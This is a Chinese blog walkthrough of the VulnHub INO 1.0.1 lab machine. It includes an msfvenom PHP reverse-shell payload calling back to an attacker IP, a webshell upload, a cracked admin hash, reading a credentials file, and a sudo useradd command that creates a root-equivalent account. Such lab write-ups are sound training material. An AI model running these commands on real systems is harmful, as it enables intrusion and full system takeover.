vulnhub——INO:1.0.1

最新推荐文章于 2024-08-09 17:06:15 发布
最新推荐文章于 2024-08-09 17:06:15 发布
阅读量170 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61619198/article/details/131658753
版权
本文详细描述了对INO-1.0.1靶机的渗透测试过程,包括使用nmap进行端口和主机发现,通过目录爆破及SQL文件解析获取登录凭据,利用msfvenom创建PHP马进行文件上传攻击,以及通过sudo提权至root权限的方法。整个过程展示了网络安全分析中的信息收集、漏洞利用和权限提升等关键环节。
摘要由CSDN通过智能技术生成

INO: 1.0.1

下载地址:

https://www.vulnhub.com/entry/ino-101,601/

解压后打开

一.nmap信息收集

//用于主机发现
sudo nmap -sn 192.168.0.0/24

//端口发现,指定扫描模式和扫描速率
sudo nmap -sT --min-rate 10000 -p- 192.168.0.172
//-sT:防火墙有基于半扫描阻止的行为,全扫描有利于隐蔽性

//详细的端口信息扫描
sudo nmap -sT -sV -sC -O -p22,80 192.168.0.172
//sC:使用nmap默认脚本扫描模式

sudo nmap -sU --top-ports 20 192.168.0.172
//--top-ports 20 : 扫描UDP常用的20个端口

sudo nmap --script=vuln -p22,80 192.168.0.172

二.攻击面的具体分析

访问靶机的80端口发现了如下页码,而且自动跳转到了/lot/这个页面,进行目录扫描

sudo dirb http://192.168.0.172/lot
发现了如下的页面,挨个进行尝试

http://192.168.0.172/lot/admin

http://192.168.0.172/lot/assets

http://192.168.0.172/lot/database
发现了一个.sql的文件,尝试去打开去搜集信息

用数据库管理工具导入.sql文件,得到了一个users表,里面有一条管理员的数据
username:admin
password:0192023a7bbd73250516f069df18b500
0192023a7bbd73250516f069df18b500:用hash-identity鉴别为MD5加密,解密得到的结果为:admin123

http://192.168.0.172/lot/admin这个页面是个登录的页面,用我们得到的账号密码尝试登录,成功登陆

通过对这个页面功能进行浏览发现了一个文件上传点,猜测存在文件上传的漏洞

当我在浏览网页源码的时候发现了作者留下的提示,我觉得应该是提示。

利用js-beautify对代码进行美化,在代码审计的时候发现和msfvenom生成的php马差不多。那我们就去生成一个

//生成一个php马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.154 lport=6666 -o Shell.php
通过随便上传一个图片然后右键查看得到了上传地址:/lot/admin/assets/uploads/maps/

把生成的Shell.php进行上传,开启监听,然后访问上传的Shell.php,成功拿到

拿到shell后第1件事就是获取一个标准shell,可通过以下命令获取python -c 'import pty; pty.spawn("/bin/bash")'

发现一个ppp用户

通过find命令去找关于ppp有关的东西

找到一个/etc/ppp,里面有个chap-secrets,查看得到了一个字符串,尝试切换ppp,成功

(root) NOPASSWD: /usr/sbin/useradd *
能创建一个用户,可以用这个来创建一个root权限的用户

sudo useradd -p `openssl passwd kiwi` kiwi -o -u 0 -g root -G root -s /bin/sh -d /home/kiwi

寻找flag

考察点:

1.nmap的使用和参数的使用

2.目录爆破的理解和使用

3.msfvenom的使用和msf监听模块的使用

4.Linux中sudo的提权方法

5.信息收集和整合的能力

思路整理:

首先使用nmap进行信息收集,然后从收集到的攻击面进行分析,当我们打开web站点的时候发现自动跳转到了/lot/这个路径下,那我们就对这个路径进行目录爆破,发现了登录页面和有.sql文件,利用数据库管理软件导入.sql文件获得了一对账号密码,成功登录到了后台页面。在对登录进来的页面浏览的时候发现了一个文件上传功能。而且在浏览某个页面的源码的时候发现了里面有类似于msfvenom生成的php马的源码,所有就顺着这个思路去制作自己的php马,用msfvenom生成然后上传,上传的路径可以通过事先上传一个正常的图片然后右键点击查看路径。在攻击机上开启一个监听,然后去访问上传的木马文件,成功上线。

拿到shell了查看一下用户,是个web低权限的用户,想办法提权。首先查看/etc/passwd有哪些可以利用的用户,查看家用户目录都发现了一个ppp用户,利用find / -name ppp 这条命令来查看有关的文件,最终在/etc/ppp/chap-secrets看到了ppp的密码,切换到ppp用户,查看其sudo权限,发现可以创建一个用户,那我们就创建一个具有root权限的用户即可。到此为止已经获得了root权限,最终找到了flag

收获总结:

1.学到了几个nmap的新参数和参数的作用:当我们在进行扫描的时候默认用的是-sS:半扫描,只建立TCP连接的第一步,这很快,但是很容易被防火墙拦截。所以可以改为使用-sT。

-sC:使用nmap自带的默认脚本进行扫描。能得到更多的信息

2.msfvenom生成的php马的源码的格式,虽然写不出来,但是看到类似的能知道是msfvenom生成的

3.使用python来获得一个更好的shell:pty​ 模块提供了一组用于操作伪终端的函数和类,pty.spawn()​ 函数用于创建一个新的伪终端并将其连接到一个子进程中,而 python -c 'import pty; pty.spawn("/bin/bash")' 的作用是使用 Python 解释器执行一段代码,从而在当前终端会话中启动一个新的 Bash shell 进程。​

4.sudo提权的方法,这个环境是能创建用户,那我们直接就使用命令创建一个root权限用户

sudo useradd -p `openssl passwd kiwi` kiwi -o -u 0 -g root -G root -s /bin/sh -d /home/kiwi

以下是 ​​​​sudo useradd -p 'openssl passwd 12345' kiw1 -o -u 0 -g root -G root -s /bin/sh -d /home/kiw1​​ 命令的每个参数作用的简体中文解释:

  • ​sudo​​:以超级用户权限运行以下命令。
  • ​useradd​​:创建一个新用户账户的命令。
  • ​-p 'openssl passwd 12345'​​:设置新用户账户的密码。密码使用 OpenSSL 库进行加密,字符串 "12345" 是明文密码。注意在实际使用中不建议使用明文密码。
  • ​kiw1​​:新账户的用户名。
  • ​-o​​:允许新用户拥有与现有用户相同的 UID。在创建备份用户时很有用。
  • ​-u 0​​:为新用户设置 UID(用户 ID)。在这种情况下,UID 被设置为 0,即 root 用户的 UID。这意味着新用户账户拥有 root 权限。
  • ​-g root​​:将新用户账户的主要组设置为 "root"。
  • ​-G root​​:将新用户添加到 "root" 组,除了他们的主要组之外。
  • ​-s /bin/sh​​:将新用户账户的默认 shell 设置为 "/bin/sh",即 Bourne shell。
  • ​-d /home/kiw1​​:将新用户账户的主目录设置为 "/home/kiw1"。这是用户文件和文档存储的目录。
KIW1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhubINO:1.0.1渗透测试
Bird&Bird
03-29 1058
目录靶机概述1、环境搭建2、信息收集3、获取shell4、提权获取高权限用户获取root权限 靶机概述 Description Back to the Top Level: Easy flags: user, root Description: This machine require a low skill to get user flag, a little more skill to escalate to root! Author: foxlox About VM: VirtualBox ready
Vulnhub: INO: 1.0.1靶机
qq_43884092的博客
09-04 119
万能密码登录后台,后台任意文件上传,ppp用户密码泄露,useradd创建root权限用户
vulnhub-ino
yutianovo的博客
12-27 437
靶机描述 Level: Easy flags: user, root Description: This machine require a low skill to get user flag, a little more skill to escalate to root! Author: foxlox About VM: VirtualBox ready, the adapter is currently Bridged, DHCP active You can contact me by email
嵌入式Linux——kmsg:分析/proc/kmsg文件以及写自己的/proc/mymsg
热门推荐
静祥阁
06-05 1万+
简介:     本文主要分析/proc/kmsg文件的形成过程以及使用cat /proc/kmsg查看log_buf中的信息时所要经历的代码。并结合上面的分析写自己的 /proc/mymsg和myprintk 。    Linux内核:linux-2.6.22.6  所用开发板:JZ2440 V3(S3C2440A) 声明:     本文主要是看完韦东山老师的视频后,自己分析代码所写。...
Perl基本技三:斯德艾特——File::stat->stat()函数获取文件属性信息
No. Liu
06-14 6863
#!usr/bin/perl use strict; use File::stat; my $path; $path = "C:/Users/liuweic/Desktop/df study/s.txt"; # scalar(localtime()) 转化正常时间格式 具体请参考 perldoc -f localtime print scalar(localtime(stat($p
linux文件 st_ino,Linux文件和目录
weixin_31948907的博客
05-03 802
Linux文件和目录文件的组成:数据块 和 inode(文件类型,属主关系,访问权限,时间戳)inode: 存放再 struct stat 中函数; int stat(const char* pathname, struct stat* buf) //获取inode通过文件名称int fstat(int fd, struct stat* buf) //获取inode...
arduino编程时加{}报错_arduino编程出现了这个错误怎么解决?
weixin_39799646的博客
12-21 2118
错误是:toomanyargumentstofunctionvoidL()sketch_dec11a.ino:Infunction'voidloop()':sketch_dec11a:5:error:toomanyargumentstofunction'voidL()'sketch_dec11a:33:error:atthispo...错误是:too many arguments to funct...
linux|南邮——实验3:C程序设计实验
qq_43808588的博客
01-19 4419
实验三 C程序设计实验 实验目的: 巩固Make使用和C程序设计语言基本语法,加深对所学知识理解。 (1) 编写一 C 程序,采用标准 I/O 库显示文本文件的内容(cat 命令)。该程序的编译和链接用 make 工具来实现,要求先产生.o 文件,再产生可执行文件,并且在 makefile 文件中具备删除中间文件(.o)的功能。 (2)编写一 C 程序,显示当前目录下的所有文件名(ls...
windows下Arduino IDE搭建 ESP32开发环境(无需网络,快速搭建)
wenzhp1975的博客
02-12 2885
近期学习ESP32,在搭建Arduino IDE的ESP32开发环境时遇到问题,安照Arduino IDE的指引设置,网速不行,下载失败! 最后尝试了直接下载ESP32 for Arduino IDE 程序包,解压到本地目录,搞定!具体步骤: 1、下载ESP32 for Arduino IDE 程序包点击下载 2、下载文件为压缩文件,双击解压文件,解压到目录:C:\Users\Adminis...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 596
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1037
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 867
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 913
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 188
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 218
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 250
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
最新发布
m0_60894143的博客
08-09 355
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
自学黑客(网络安全
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
E:\arduinofile\arduinofile.ino: In function 'void loop()': E:\arduinofile\arduinofile.ino:19:19: error: expected primary-expression before '.' token int ret = dht11.read(); ^ E:\arduinofile\arduinofile.ino:29:24: error: 'AI2' was not declared in this scope float m1= analogRead(AI2); ^~~ E:\arduinofile\arduinofile.ino:29:24: note: suggested alternative: 'A2' float m1= analogRead(AI2); ^~~ A2 E:\arduinofile\arduinofile.ino:30:24: error: 'AI3' was not declared in this scope float m2= analogRead(AI3); ^~~ E:\arduinofile\arduinofile.ino:30:24: note: suggested alternative: 'A3' float m2= analogRead(AI3); ^~~ A3 E:\arduinofile\arduinofile.ino:33:30: error: expected primary-expression before '.' token Serial.print((float)dht11.getTemperature(), 2); ^ E:\arduinofile\arduinofile.ino:35:31: error: expected primary-expression before '.' token Serial.print((float)dht11.getHumidity(), 2); ^ exit status 1 Compilation error: expected primary-expression before '.' token
05-30
这个错误通常是因为你的代码中使用了错误的语法或语法错误。具体来说,有以下几个可能的原因: 1. 在调用函数时,你没有使用正确的语法。在 Arduino 中,调用函数时需要使用点运算符(`.`)或箭头运算符(`->`),...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值